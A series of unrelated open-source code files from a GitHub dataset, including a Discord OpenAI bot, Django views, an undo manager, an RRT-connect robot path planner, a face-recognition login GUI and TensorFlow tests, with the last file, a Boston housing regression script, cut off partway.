            embed.add_field(name="Resposta:", value=response.choices[0].text)
            await asyncio.sleep(0.1)
            await interaction.send(embed=embed)
        except Exception as ex:
            logger.error(f"Error - {ex}")
    @nextcord.slash_command(name="image",description="Ask Bill to generate a image for you!")
    async def image(self,interaction: Interaction, prompt: str):
        """Ask OpenAI's image API to generate a 512x512 image from a prompt."""
        try:
            logger.debug(f"Prompt from user id {interaction.user.id}: {prompt}")
            await interaction.response.defer()
            embed = nextcord.Embed(title=f"{prompt}", description=f"Imagem pedida por {interaction.user.display_name}")
            response = openai.Image.create(
                prompt=f"{prompt}",
                n=1,
                size="512x512"
            )
            image_url = response['data'][0]['url']
            embed.set_image(image_url)
            await asyncio.sleep(0.1)
            await interaction.send(embed=embed)
        except openai.error.OpenAIError:
            # Content-policy / API rejections get a user-facing reply.
            await asyncio.sleep(0.1)
            await interaction.send("Desculpe, mas você pediu algo que não é permitido pelo OpenAI! Tente novamente!")
        except Exception as ex:
            # Anything else is only logged; the interaction stays deferred.
            logger.error(f"Error - {ex}")
| TiberiusBR/CaldeiraoBot | cogs/ai.py | ai.py | py | 2,369 | python | en | code | 1 | github-code | 13 |
4997304495 | from django.shortcuts import render
from django.http import HttpResponse
from . import forms
# Create your views here.
def index(request):
context = {}
context['personForm'] = forms.PersonForm()
context['livesForm'] = forms.LivesForm()
context['worksForm'] = forms.WorksForm()
return render(request, "templates/index2.html", context)
# return HttpResponse("Hi there")
def success_view(request):
personForm = forms.PersonForm()
worksForm = forms.WorksForm()
livesForm = forms.LivesForm()
if request.method == "POST":
personForm = forms.PersonForm(request.POST)
if personForm.is_valid():
personForm_name = personForm.cleaned_data["name"]
personForm_street = personForm.cleaned_data["street"]
personForm_city = personForm.cleaned_data["city"]
personForm_company = personForm.cleaned_data["company"]
personForm_salary = personForm.cleaned_data["salary"]
print("inserted ==>", personForm_name, personForm_street, personForm_city,
personForm_company, personForm_salary)
return render(request, "templates/success2.html", context=None)
| teetangh/Kaustav-CSE-LABS-and-Projects | Sem06-Web-Dev-LAB/WEEK 07/week07/question2_app/views.py | views.py | py | 1,220 | python | en | code | 2 | github-code | 13 |
3959021082 | import threading
from app import db
from cloud_components.request_executor import RequestExecutor
class RequestScheduler:
def __init__(self, config_id):
self.deploy_id = config_id
self.__executing__ = False
self.__executing_lock__ = threading.Lock()
self.__current_request_id__ = None
self.request_counter = 0
pass
def start_executing(self):
if not self.__executing__:
self.__executing_lock__.acquire()
self.__executing__ = True
self.__executing_lock__.release()
thread_destroy = threading.Thread(target=self.__start_executing__, args=[], daemon=True)
thread_destroy.start()
def get_queued_requests(self):
return RequestExecutor.query.filter(RequestExecutor.request_end == None) \
.filter(RequestExecutor.deploy_id == self.deploy_id) \
.order_by(RequestExecutor.request_time) \
.all()
def remove_queued_requests(self, request_id):
provided_request = RequestExecutor.query. \
filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.id == request_id).first()
requests_to_delete = RequestExecutor.query. \
filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.request_time > provided_request.request_time).all()
db.session.delete(provided_request)
for request in requests_to_delete:
db.session.delete(request)
db.session.commit()
def get_current_request(self):
if (not self.__current_request_id__):
return None
return RequestExecutor.query \
.filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.id == self.__current_request_id__) \
.first()
def request_now(self, request_executor):
thread = threading.Thread(target=request_executor.execute, args=[], daemon=True)
thread.start()
# All queued requests are executed till none are found
def __start_executing__(self):
current_request : RequestExecutor = RequestExecutor.query \
.filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.request_end == None) \
.order_by(RequestExecutor.request_time) \
.first()
try:
while current_request:
self.__current_request_id__ = current_request.id
current_request.execute()
current_request = RequestExecutor.query \
.filter(RequestExecutor.deploy_id == self.deploy_id) \
.filter(RequestExecutor.request_end == None) \
.order_by(RequestExecutor.request_time) \
.first()
self.__current_request_id__ = None
finally:
self.__current_request_id__ = None
self.__executing_lock__.acquire()
self.__executing__ = False
self.__executing_lock__.release()
| Ydjeen/openstack_testbed | cloud_components/request_scheduler.py | request_scheduler.py | py | 3,064 | python | en | code | 1 | github-code | 13 |
23162245029 | # -*- coding: utf-8 -*-
import copy
# ******* How It Works ************
# For each changes on paper, current paper state is saved.
# To save state, first all top level object list is copied.
# List of all objects on paper (top levels and their children) are generated
# Attribute values of each those objects are stored in separate dictionaries
# in {"attribute_name":value} format.
# While restoring, attribute values of those objects are restored.
# Finally, top level object list on paper is updated.
# redrawing of objects is done whenever necessary.
# each drawable must contain these three attributes
# meta__undo_properties -> attribute that dont need coping, eg - int, string, bool, tuple etc
# meta__undo_copy -> attributes that need copying (e.g - list, set, dict)
# meta__undo_children_to_record -> objects that are not top levels, must be list or set of objects
class UndoManager:
MAX_UNDO_LEVELS = 50
def __init__(self, paper):
self.paper = paper
self._stack = []
self.clean()
self.save_current_state("empty paper")
def clean(self):
self._pos = -1
for record in self._stack:
record.clean()
self._stack.clear()
def save_current_state(self, name=''):
""" push current paper state to the stack """
if len( self._stack)-1 > self._pos:
del self._stack[(self._pos+1):]
if len( self._stack) >= self.MAX_UNDO_LEVELS:
del self._stack[0]
self._pos -= 1
self._stack.append(PaperState(self.paper, name))
self._pos += 1
def undo(self):
"""undoes the last step and returns the number of undo records available"""
self._pos -= 1
if self._pos >= 0:
self._stack[self._pos].restore_state()
else:
self._pos = 0
return self._pos
def redo(self):
"""redoes the last undone step, returns number of redos available"""
self._pos += 1
if self._pos < len( self._stack):
self._stack[ self._pos].restore_state()
else:
self._pos = len( self._stack)-1
return len(self._stack) - self._pos -1
def get_last_record_name(self):
"""returns the last closed record name"""
if self._pos >= 1:
return self._stack[self._pos-1].name
else:
return None
def delete_last_record(self):
"""deletes the last record, useful for concatenation of several records to one;
especially powerful in combination with named records"""
if self._pos > 0:
del self._stack[ self._pos-1]
self._pos -= 1
def can_undo( self):
return bool(self._pos)
def can_redo( self):
return bool( len(self._stack) - self._pos - 1)
def cleanAll( self):
""" do proper clean """
self.clean()
del self.paper
del self._stack
##-------------------- STATE RECORD --------------------
class PaperState:
    """ It saves current paper state, and can restore whenever necessary """

    def __init__(self, paper, name):
        """Snapshot the paper: record every object on it and the values of
        each object's undo-tracked attributes."""
        self.paper = paper
        self.name = name
        self.top_levels = self.paper.objects[:]# list of top level objects on paper
        self.objects = self.get_objects_on_paper()# list of objects whose attributes are stored
        self.records = []# attribute values of above objects
        for o in self.objects:
            rec = {}
            # scalar attributes are stored by value
            for a in o.meta__undo_properties:
                rec[a] = getattr(o, a)
            # container attributes are shallow-copied so later edits don't alias
            for a in o.meta__undo_copy:
                rec[a] = copy.copy(o.__dict__[a])
            self.records.append(rec)

    def clean(self):
        # release every reference this snapshot holds
        del self.name
        del self.paper
        del self.top_levels
        del self.objects
        del self.records

    def get_objects_on_paper(self):
        """ recursively list of all objects on paper (toplevel and non-toplevel) """
        stack = list(self.paper.objects)
        result = []
        while len(stack):
            obj = stack.pop()
            result.append(obj)
            # descend into child objects declared as undo-recordable
            for attr in obj.meta__undo_children_to_record:
                children = getattr(obj, attr)
                [stack.append(child) for child in children]
        return result

    def restore_state(self):
        """sets the system to the recorded state (update is done only where necessary,
        not changed values are not touched)."""
        current_objects = set(self.get_objects_on_paper())
        to_be_added = set(self.objects) - current_objects # previously deleted objects
        to_be_removed = current_objects - set(self.objects) # previously added objects
        changed_objs = set()
        changed_objs |= to_be_added
        # First restore attribute values, and check which objects changed
        for i, o in enumerate(self.objects):
            changed = 0
            for a in o.meta__undo_properties:
                if self.records[i][a] != getattr( o, a):
                    setattr( o, a, self.records[i][a])
                    changed = 1
            for a in o.meta__undo_copy:
                if self.records[i][a] != o.__dict__[a]:
                    o.__dict__[a] = copy.copy( self.records[i][a])
                    changed = 1
            if changed:
                # e.g - vertices and atoms in Molecule points to same list object
                for a1, a2 in o.meta__same_objects.items():
                    o.__dict__[a1] = o.__dict__[a2]
                changed_objs.add(o)
        # check which objects need to redraw
        to_redraw = changed_objs.copy()
        for o in changed_objs:
            # atom is changed, bonds and marks also need to redraw
            if o.class_name == 'Atom':
                to_redraw |= set([b for b in o.bonds])
                # when atom is moved, marks also moved (but its relative pos does not change).
                # Then marks are not redrawn automatically, so we are redrawing them manually
                to_redraw |= set(m for m in o.marks)
            # if bond changed, attached atoms must be redrawn first
            elif o.class_name == 'Bond':
                to_redraw |= set([a for a in o.atoms])
        to_redraw -= to_be_removed
        for o in to_be_removed:
            o.clearDrawings()
        # now redrawing (lower-priority objects first so layering stays correct)
        to_redraw = sorted(to_redraw, key=lambda obj : obj.redraw_priority)
        for o in to_redraw:
            o.paper = self.paper
            o.draw()
        self.paper.objects = self.top_levels[:]
| ksharindam/chemcanvas | chemcanvas/undo_manager.py | undo_manager.py | py | 6,542 | python | en | code | 1 | github-code | 13 |
1166225514 |
from pathlib import Path
from tkinter import Tk, Canvas, Entry, Text, Button, PhotoImage
from tkinter import *
import cv2
import face_recognition
import sqlite3
import numpy as np
import qr_detection
from tkinter import messagebox
import homepage as hp
from datetime import datetime
def go_detect_qr(current_window,correct_str,name):
    """Advance from face recognition to the QR step, or bounce back to the
    homepage (with a log entry) if the recognised user is not admin-authorized.

    Relies on the module-level `authorized` flag set by detect_face().
    """
    global authorized
    if authorized==0:
        # recognised but not approved by the admin: log and return to homepage
        messagebox.showerror('error','the user is registered but has not been authorized by the admin')
        now = datetime.now()
        dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
        with open("login_log.txt",'a') as f:
            f.write(f"{name} had face authenticated but was not authorized to enter "+dt_string+"\n")
        current_window.destroy()
        hp.homepage()
    else:
        current_window.destroy()
        qr_detection.detect_qr(correct_str,name)
def retry(cam,window_detect_face):
    """Release the camera, tear down the current window and restart the
    whole face-detection flow from scratch."""
    # print(" TRY AGIAN CALLED")
    cam.release()
    cv2.destroyAllWindows()
    window_detect_face.destroy()
    detect_face()
def get_image():
    """Convert the current global BGR `frame` into a 700x394 Tk PhotoImage
    (stored in the global `img`) suitable for displaying in a Label."""
    global img
    global frame
    f = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    img = cv2.resize(f, (700, 394))
    # PhotoImage can decode PNG bytes directly, avoiding a temp file
    img = PhotoImage(data=cv2.imencode('.png', img)[1].tobytes())
    return img
def update_cam(cam_label,window_detect_face,cam):
    """Periodic Tk callback: grab one camera frame, show it in `cam_label`,
    then reschedule itself after 10 ms.

    BUGFIX/perf: the previous version also ran face_recognition location and
    encoding on every frame and discarded the results (`boxes`, `encodings`
    and `names` were never used) — that dead work made the live preview
    extremely slow and is removed; recognition itself happens once in
    detect_face().
    """
    global img
    global frame
    ret, frame = cam.read()
    if ret:
        img = get_image()
        cam_label.config(image=img)
        cam_label.image = img
    window_detect_face.after(10,lambda: update_cam(cam_label,window_detect_face,cam))
def detect_face():
    """Open the face-recognition window: build the Tk UI, grab one camera
    frame, match any detected face against the encodings stored in the user
    database, and enable the green "go ahead" button when a registered user
    is recognised.

    NOTE(review): recognition runs only on the FIRST captured frame; the
    update_cam() callback merely refreshes the preview afterwards.
    Side effects: sets the module globals window_detect_face, frame, img,
    authorized and the button-image globals; appends to login_log.txt.
    """
    global window_detect_face
    idx = None
    correct_str = None
    name = None
    OUTPUT_PATH = Path(__file__).parent
    ASSETS_PATH = OUTPUT_PATH / Path(r"assets\frame9")
    def relative_to_assets(path: str) -> Path:
        # resolve a UI asset file name against the assets folder
        return ASSETS_PATH / Path(path)
    window_detect_face = Toplevel()
    window_detect_face.title("Detect Face")
    window_detect_face.geometry("1440x900")
    window_detect_face.configure(bg = "#FFFFFF")
    canvas = Canvas(
        window_detect_face,
        bg = "#FFFFFF",
        height = 900,
        width = 1440,
        bd = 0,
        highlightthickness = 0,
        relief = "ridge"
    )
    canvas.place(x = 0, y = 0)
    canvas.create_text(
        40.0,
        30.0,
        anchor="nw",
        text="SecureLabs",
        fill="#000000",
        font=("Poppins SemiBold", 25 * -1)
    )
    canvas.create_text(
        41.0,
        175.0,
        anchor="nw",
        text="Face\nRecogination",
        fill="#000000",
        font=("Poppins SemiBold", 45 * -1)
    )
    canvas.create_text(
        40.0,
        358.0,
        anchor="nw",
        text="Make sure you are\nin visible range",
        fill="#000000",
        font=("Poppins SemiBold", 26 * -1)
    )
    # images must be kept in globals: Tk PhotoImages are garbage-collected
    # (and disappear from the UI) if only the widget references them
    global cam_bck_image
    global ty_again_button_image
    global go_ahead_green_button_image
    global go_ahead_red_button_image
    cam_bck_image = PhotoImage(
        file=relative_to_assets("image_1.png"))
    cam_frame = Frame(window_detect_face,width=1009,height=859)
    cam_frame.pack_propagate(0)
    cam_frame.place(x = 414,y = 21)
    cam_label = Label(cam_frame,width=700,height=394)
    cam_label.place(relx = 0.5,rely = 0.5,anchor=CENTER)
    bg_img = Label(cam_frame, image=cam_bck_image)
    bg_img.pack()
    bg_img.lower()
    cam = cv2.VideoCapture(0)
    ty_again_button_image = PhotoImage(
        file=relative_to_assets("button_1.png"))
    try_again_button = Button(
        window_detect_face,
        image=ty_again_button_image,
        borderwidth=0,
        highlightthickness=0,
        command=lambda: retry(cam,window_detect_face),
        relief="flat"
    )
    try_again_button.place(
        x=95.0,
        y=675.0,
        width=212.0,
        height=53.0
    )
    go_ahead_red_button_image = PhotoImage(
        file=relative_to_assets("button_2.png"))
    # red (inactive) button shown while no user is recognised; it is a no-op
    go_ahead_red_button = Button(
        window_detect_face,
        image=go_ahead_red_button_image,
        # state="disabled",
        borderwidth=0,
        highlightthickness=0,
        command=lambda: print(""),
        relief="flat"
    )
    go_ahead_red_button.place(
        x=93.0,
        y=585.0,
        width=212.0,
        height=53.0
    )
    go_ahead_green_button_image = PhotoImage(
        file=relative_to_assets("button_3.png"))
    # the lambda closes over correct_str/name, so it sees the values assigned
    # by the recognition loop below, not the initial None
    go_ahead_green_button = Button(
        window_detect_face,
        image=go_ahead_green_button_image,
        state="disabled",
        borderwidth=0,
        highlightthickness=0,
        command=lambda: go_detect_qr(window_detect_face,correct_str,name),
        relief="flat"
    )
    go_ahead_green_button.place(
        x=93.0,
        y=585.0,
        width=212.0,
        height=53.0
    )
    go_ahead_green_button.lower()
    name_label = Label(
        window_detect_face,
        text= "NOT RECOGINSED",
        font=("Poppins SemiBold", 26 * -1)
    )
    name_label.place(x = 40.0,y = 480.0)
    db = sqlite3.connect("app_data/user_data.sqlite")
    c = db.cursor()
    global frame
    global img
    # one-shot recognition on the first frame
    ret, frame = cam.read()
    rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
    boxes = face_recognition.face_locations(rgb, model='hog')
    encodings = face_recognition.face_encodings(rgb, boxes)
    names = []
    # name = None
    global authorized
    authorized = 0
    for encoding in encodings:
        # retrieve all stored face encodings from database
        c.execute('SELECT * FROM USERS')
        rows = c.fetchall()
        # row layout (by index): 1=name, 5=face encoding blob, 6=QR string, 7=authorized flag
        stored_encodings = [np.frombuffer(row[5], dtype=np.float64) for row in rows]
        names = [row[1] for row in rows]
        # indices = [row[0] for row in rows]
        strs = [row[6] for row in rows]
        auth_values = [row[7] for row in rows]
        # compute distances between current face encoding and stored encodings
        distances = face_recognition.face_distance(stored_encodings, encoding)
        min_idx = np.argmin(distances)
        min_distance = distances[min_idx]
        # if the minimum distance is less than a threshold, the face is recognized
        if min_distance < 0.6:
            name = names[min_idx]
            name_label['text'] = name
            # idx = indices[min_idx]
            correct_str = strs[min_idx]
            authorized = auth_values[min_idx]
            now = datetime.now()
            dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
            with open('login_log.txt','a') as f:
                f.write(f"{name} tried to login got face authenticated successfully "+dt_string+"\n")
        else:
            name = 'unknown'
            now = datetime.now()
            dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
            with open("login_log.txt",'a') as f:
                f.write("unknown person tried to login "+dt_string+"\n")
        # draw bounding box and label around the face
        # top, right, bottom, left = boxes[0]
        # cv2.rectangle(frame, (left, top), (right, bottom), (0, 255, 0), 2)
        # cv2.putText(frame, name, (left, top - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)
    # print(" person is recogonized as ",name)
    if name is not None and name!='unknown':
        # a registered user was recognised: swap in the active green button
        go_ahead_red_button.lower()
        go_ahead_green_button.lift()
        go_ahead_green_button['state'] = NORMAL
        go_ahead_red_button['state'] = DISABLED
    if ret:
        img = get_image()
        cam_label.config(image=img)
        cam_label.image = img
    window_detect_face.after(10,lambda: update_cam(cam_label,window_detect_face,cam))
    window_detect_face.resizable(False, False)
# window_detect_face.mainloop() | chirag-3/secure-lab-access-using-face-recognition-and-qr-code-scan | face_detection1.py | face_detection1.py | py | 8,003 | python | en | code | 0 | github-code | 13 |
# EGE task 27: count contiguous runs of length >= k whose numbers of odd and
# even elements are equal.
# Rewritten from the original O(n^3) enumerate-every-window version to an
# O(n) prefix-balance scan (same output): a window [i, z] is balanced exactly
# when prefix[z + 1] == prefix[i], where prefix accumulates +1 per odd and
# -1 per even element.
from collections import defaultdict

with open('27test-lshastin') as f:
    a = f.read()
a = a.split('\n')
a.pop(0)
a = list(map(int, a))
k = a.pop(0)

prefix = [0]
for x in a:
    prefix.append(prefix[-1] + (1 if x % 2 else -1))

c = 0
seen = defaultdict(int)
for j in range(k, len(prefix)):
    # prefixes at positions i <= j - k are now far enough back to form a
    # window of length >= k ending just before j
    seen[prefix[j - k]] += 1
    c += seen[prefix[j]]
print(c)
23171025189 | from networkit import Graph
class MongoDBStorage:
    """Persists a networkit graph into a MongoDB collection as one document."""

    def storeGraph(self, collection, graph: Graph):
        """Serialize `graph` to {"nodes": [...]} and insert it into `collection`.

        Each node entry carries its id, its outgoing-neighbour list and the
        neighbour count.
        """
        document = {"nodes": []}
        for node in graph.nodes():
            neighbours = []
            # collect the target node of every edge incident to `node`
            graph.forEdgesOf(node, lambda u, v, weight, edge_id:
                             (neighbours.append(v)))
            document["nodes"].append({
                "id": node,
                "associatednodescount": len(neighbours),
                "associatednodes": neighbours
            })
        collection.insert_one(document)
| kshaposhnikov/twitter-graph-model | tgml/loader/mongodbstorage.py | mongodbstorage.py | py | 599 | python | en | code | 0 | github-code | 13 |
17514468979 | from django.urls import path
from . import api_views
# URL namespace for reversing these routes (e.g. 'spacyal_api:retrievecases')
app_name = 'spacyal_api'

# API endpoints of the spacyal active-learning app; each maps to a
# class-based view in api_views.
urlpatterns = [
    path('retrievecases/', api_views.RetrieveCasesView.as_view(),
         name='retrievecases'),
    path('progress_model/', api_views.GetProgressModelView.as_view(),
         name='progress_model'),
    path('download_model/', api_views.DownloadModelView.as_view(),
         name='download_model'),
    path('download_cases/', api_views.DownloadCasesView.as_view(),
         name='download_cases'),
    path('project_history/', api_views.GetProjectHistory.as_view(),
         name='project_history'),
]
| sennierer/spacyal | spacyal/api_urls.py | api_urls.py | py | 601 | python | en | code | 5 | github-code | 13 |
10720266149 | #!/usr/bin/env python3
from cmath import pi
from math import dist
import random
from turtle import pos
from typing import List
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from fwd_kinematics import *
JointValues = List[float]
JointValuesList = List[JointValues]
from pylib import Communication
com = Communication()
class RRT_connect:
    """Bidirectional RRT-connect planner in 6-DOF joint space.

    Grows one tree from `start` and one from `stop`; collision checks are
    delegated to the external `com` (simulator) object and sampled
    configurations are visualised via forward kinematics.
    """
    class Node:
        """
        Tree node: a joint-space configuration with a link to its parent.
        """
        def __init__(self, p):
            self.point=p
            # self.path = [] # path data for plotting; can also be seen as the stored edge set
            self.parent = None # parent node
    def __init__(self,start,stop,rand_area=None,expand_dis=pi/100, goal_sample_rate=5,max_iter=1000):
        # start/stop: 6-element joint configurations
        # expand_dis: per-iteration step size in joint space
        # NOTE(review): rand_area and goal_sample_rate are stored/accepted but never used
        self.start=start
        self.stop=stop
        self.area=rand_area
        self.step=expand_dis
        self.max_iter=max_iter
        self.tree_list_1 = []
        self.tree_list_2 = []
        self.tree_list_1.append(self.Node(start))
        self.tree_list_2.append(self.Node(stop))
    def generate_random_point(self):
        """Sample a uniformly random 6-joint configuration in [-pi, pi)^6."""
        # x:-0.664  0.336
        # y:-0.736  0.264
        # z:0.102  0.881
        seed_1=random.random()
        seed_2=random.random()
        seed_3=random.random()
        seed_4=random.random()
        seed_5=random.random()
        seed_6=random.random()
        rand_1=2*pi*seed_1+(-pi)
        rand_2=2*pi*seed_2+(-pi)
        rand_3=2*pi*seed_3+(-pi)
        rand_4=2*pi*seed_4+(-pi)
        rand_5=2*pi*seed_5+(-pi)
        rand_6=2*pi*seed_6+(-pi)
        rand_point=self.Node([rand_1,rand_2,rand_3,rand_4,rand_5,rand_6])
        return rand_point
    def Extend_Tree(self):
        """Main loop: alternately grow both trees until they connect or
        max_iter samples are exhausted; plots every accepted point in 3D.

        NOTE(review): when distance <= step, `p_new=rand_point` assigns a Node
        and is then wrapped in Node() again (p_new.point becomes a Node);
        also `p_new2` may be unbound at the p4 plotting line when the first
        sampled point collides — both look like latent bugs to confirm.
        """
        fig = plt.figure()
        ax = Axes3D(fig)
        # plot start and stop end-effector positions
        p1=fwd_kinematics([self.start[0], self.start[1],self.start[2],self.start[3], self.start[4],self.start[5]])
        ax.scatter(p1[0],p1[1],p1[2])
        p2=fwd_kinematics([self.stop[0], self.stop[1],self.stop[2],self.stop[3], self.stop[4],self.stop[5]])
        ax.scatter(p2[0],p2[1],p2[2])
        # plt.show()
        for i in range(self.max_iter):
            rand_point=self.generate_random_point()
            step=self.step
            # extend tree 1 toward the random sample
            nearest_point=self.Find_nearest(rand_point.point,self.tree_list_1)
            distance=self.Cal_distance(rand_point.point,nearest_point.point)
            if distance>step:
                p_new=self.Generate_point_new(distance,rand_point,nearest_point)
            else:
                p_new=rand_point
            print(p_new)
            print(rand_point.point)
            print(nearest_point.point)
            p_new=self.Node(p_new)
            p_new.parent=nearest_point
            # p_new.path=[p_new.parent.path,p_new.point]
            #check collision
            # mid_p_new=[p_new.point[0]/2,p_new.point[1]/2,p_new.point[2]/2]
            if not self.Check_collision(p_new.point):
                self.tree_list_1.append(p_new)
                # extend tree 2 toward the newly added point of tree 1
                nearest_point2=self.Find_nearest(p_new.point,self.tree_list_2)
                distance2=self.Cal_distance(p_new.point,nearest_point2.point)
                if distance2>step:
                    p_new2=self.Generate_point_new2(distance2,p_new,nearest_point2)
                else:
                    p_new2=rand_point
                # print()
                p_new2=self.Node(p_new2)
                p_new2.parent=nearest_point2
                # mid_p_new2=[p_new2.point[0]/2,p_new2.point[1]/2,p_new2.point[2]/2]
                if not self.Check_collision(p_new2.point):
                    self.tree_list_2.append(p_new2)
                    if self.Check_end():
                        break
            p3=fwd_kinematics([p_new.point[0], p_new.point[1],p_new.point[2],p_new.point[3], p_new.point[4],p_new.point[5]])
            ax.scatter(p3[0],p3[1],p3[2])
            p4=fwd_kinematics([p_new2.point[0], p_new2.point[1],p_new2.point[2],p_new2.point[3], p_new2.point[4],p_new2.point[5]])
            ax.scatter(p4[0],p4[1],p4[2])
        plt.show()
    def Cal_distance(self,p,q):
        # Euclidean distance in joint space (math.dist)
        # dis=sqrt((p[0]-q[0])**2+(p[1]-q[1])**2+(p[2]-q[2])**2)
        dis=dist(p,q)
        return dis
    def Check_collision(self,p):
        """True when configuration `p` is in collision (per the simulator)."""
        hsCol = com.hasCollision(p)
        clr = com.clearance(p)  # NOTE(review): clearance is queried but unused
        if hsCol==True:
            return True
        else:
            return False
    def Find_nearest(self, p, tree):
        """Return the node of `tree` closest (joint-space distance) to `p`."""
        dis_s=[]
        for i in range(len(tree)):
            point_temp=tree[i]
            dis=self.Cal_distance(point_temp.point,p)
            dis_s.append(dis)
        inx=np.argmin(dis_s)
        return tree[inx]
    def Generate_point_new(self,distance,rand_point,nearest_point):
        """Step from nearest_point toward rand_point by `self.step`."""
        # print(rand_point.point[0])
        # p_new_1=(self.step/distance)*(rand_point.point[0]-nearest_point.point[0])+nearest_point.point[0]
        # p_new_2=(self.step/distance)*(rand_point.point[1]-nearest_point.point[1])+nearest_point.point[1]
        # p_new_3=(self.step/distance)*(rand_point.point[2]-nearest_point.point[2])+nearest_point.point[2]
        # p_new_4=(self.step/distance)*(rand_point.point[3]-nearest_point.point[3])+nearest_point.point[3]
        # p_new_5=(self.step/distance)*(rand_point.point[4]-nearest_point.point[4])+nearest_point.point[4]
        # p_new_6=(self.step/distance)*(rand_point.point[5]-nearest_point.point[5])+nearest_point.point[5]
        new_point=[]
        for i in range(6):
            value=nearest_point.point[i]+(self.step/distance)*(rand_point.point[i]-nearest_point.point[i])
            new_point.append(value)
        return new_point
        # return [p_new_1,p_new_2,p_new_3,p_new_4,p_new_5,p_new_6]
    def Generate_point_new2(self,distance,rand_point,nearest_point):
        """Step from nearest_point (tree 2) toward rand_point by `self.step`.

        NOTE(review): the active loop is identical to Generate_point_new even
        though the commented-out formula suggests a different (remaining-
        distance) step was intended — confirm which is correct.
        """
        # p_new_1=((distance-self.step)/distance)*(nearest_point.point[0]-rand_point.point[0])+rand_point.point[0]
        # p_new_2=((distance-self.step)/distance)*(nearest_point.point[1]-rand_point.point[1])+rand_point.point[1]
        # p_new_3=((distance-self.step)/distance)*(nearest_point.point[2]-rand_point.point[2])+rand_point.point[2]
        # p_new_4=((distance-self.step)/distance)*(nearest_point.point[3]-rand_point.point[3])+rand_point.point[3]
        # p_new_5=((distance-self.step)/distance)*(nearest_point.point[4]-rand_point.point[4])+rand_point.point[4]
        # p_new_6=((distance-self.step)/distance)*(nearest_point.point[5]-rand_point.point[5])+rand_point.point[5]
        new_point=[]
        for i in range(6):
            value=nearest_point.point[i]+(self.step/distance)*(rand_point.point[i]-nearest_point.point[i])
            new_point.append(value)
        return new_point
    def Check_end(self):
        """True when any pair of nodes from the two trees is within one step.

        NOTE(review): returns None (falsy) instead of False when no pair is
        close enough — callers only truth-test the result, so it works.
        """
        for i in range(len(self.tree_list_1)):
            for j in range(len(self.tree_list_2)):
                if self.Cal_distance(self.tree_list_1[i].point,self.tree_list_2[j].point)>self.step:
                    continue
                else:
                    return True
def compilePath(start: JointValues, stop: JointValues) -> JointValuesList:
    """Stub path 'planner': validates the two 6-joint configurations, logs
    their collision/clearance status and returns [start, stop].

    Returns None when either configuration does not have 6 joints.
    """
    print('start = ', start)
    print('stop = ', stop)
    if len(start) != 6 or len(stop) != 6:
        print('Array length mismatch')
        return None
    poseList = list()
    poseList.append(start)
    hsCol = com.hasCollision(start)
    clr = com.clearance(start)
    print("start:", "iscollision",hsCol, "clearance", clr)
    poseList.append(stop)
    hsCol = com.hasCollision(stop)
    clr = com.clearance(stop)
    print("stop:", "iscollision", hsCol, "clearance", clr)
    # fill in the poses
    return poseList
def DergeeToRadius(degree):
    """Convert an angle in degrees to radians.

    (Name typo 'Dergee' kept as-is so existing callers keep working.)
    """
    ratio = degree / 180
    return ratio * pi
if __name__ == '__main__':
    # com._mainLoop(compilePath)
    # Standalone run with hard-coded start/stop joint configurations.
    rrt=RRT_connect(start=[-2.194994195566857, -2.204066153002122, -1.782691206638569, -2.296184584257166, -0.2502436962787926, 1.653367853706748],stop=[-2.194994195566857, -1.866362961559723, -1.422051457171162, -2.994527525166973, -0.2502436962787904, 1.653367853706747])
    rrt.Extend_Tree()
| vineetjnair9/DT_sim | RRT_Connect_Du.py | RRT_Connect_Du.py | py | 7,979 | python | en | code | 0 | github-code | 13 |
45187569796 | import tensorflow as tf
from tests.cnn.image_input_4d import ImageInput4D
from tfoptests.nn_image_ops import NNImageOps
from tfoptests.persistor import TensorFlowPersistor
def test_conv_1():
    """Build a conv3d graph over a random [4, 2, 28, 28, 3] input, freeze it
    via TensorFlowPersistor, and print the post-freeze prediction shape."""
    # [4, 2, 28, 28, 3]
    image_input = ImageInput4D(seed=713, batch_size=4, in_d=2, in_h=28, in_w=28, in_ch=3)
    in_node = image_input.get_placeholder("image", data_type=tf.float32)
    constr = NNImageOps(in_node)
    # in_channels must match between input and filter.
    # [filter_depth, filter_height, filter_width, in_channels, out_channels].
    filter = [2, 5, 5, 3, 4]
    constr.set_filter_size(filter)
    # Must have strides[0] = strides[4] = 1.
    stride = [1, 5, 4, 3, 1]
    constr.set_stride_size(stride_val=stride)
    in1 = constr.execute("conv3d")
    constr.set_image(in1)
    # flatten the conv output so it can feed a dense matmul
    in2 = constr.flatten_convolution(in1)
    out_node = tf.matmul(in2, tf.Variable(tf.random_uniform([280, 3])), name="output") # calc required dims by hand
    placeholders = [in_node]
    predictions = [out_node]
    tfp = TensorFlowPersistor(save_dir="conv_1")
    predictions_after_freeze = tfp \
        .set_placeholders(placeholders) \
        .set_output_tensors(predictions) \
        .set_test_data(image_input.get_test_data()) \
        .build_save_frozen_graph()
    print(predictions_after_freeze[0].shape)
# BUGFIX: the guard compared against "main", which is never the value of
# __name__, so the test could not be run as a script. The module attribute
# is "__main__" when executed directly.
if __name__ == "__main__":
    test_conv_1()
| kgnandu/TFOpTests | tests/cnn/test_conv_1.py | test_conv_1.py | py | 1,358 | python | en | code | 0 | github-code | 13 |
14249253026 | '''
Author: rootReturn0
Date: 2020-09-08 10:53:58
LastEditors: rootReturn0
LastEditTime: 2020-09-08 17:30:38
Description:
'''
from pandas.core.common import random_state
from sklearn import datasets
from sklearn.preprocessing import StandardScaler
from sklearn.feature_selection import *
from sklearn.model_selection import train_test_split
from sklearn.metrics import *
import math
import matplotlib.pyplot as plt
import pandas as pd
# number of top features to keep for training
FEATURE_NUM = 3
# Boston housing data; MEDV (median home value) is the prediction target
data = pd.read_csv('boston.csv')
# house = datasets.load_boston()
# X = house.data
# Y = house.target
X = data.drop(columns='MEDV')
Y = data['MEDV']
# NOTE(review): 'SVM' has no branch in selectModel() below (only 'SVM-P' /
